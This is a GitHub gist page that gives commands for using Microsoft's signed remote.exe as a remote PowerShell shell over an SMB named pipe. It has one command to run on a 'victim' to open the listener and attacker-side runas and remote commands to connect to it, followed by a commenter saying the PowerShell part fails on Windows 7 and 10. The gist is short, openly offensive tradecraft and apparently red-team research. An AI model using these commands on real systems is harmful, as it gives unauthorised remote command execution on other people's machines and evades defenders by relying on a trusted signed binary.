Skip to content

Instantly share code, notes, and snippets.

@mattifestation
Created November 19, 2016 17:07
Show Gist options
  • Save mattifestation/8ef36782ceb7f73d74cfb00c2a710301 to your computer and use it in GitHub Desktop.
Save mattifestation/8ef36782ceb7f73d74cfb00c2a710301 to your computer and use it in GitHub Desktop.
remote.exe - a useful, MS signed SMB shell
# Command to run on the victim
# This will establish a PowerShell listener over the "pwnme" named pipe
remote /S "powershell.exe" pwnme
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
runas /netonly /user:[Domain|Hostname\Username] "cmd"
remote /C [Hostname\IP] "pwnme"
@securesean
Copy link

powershell doesn't work for me on windows 10 or 7
powershell wont work
powershell wont work win7

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment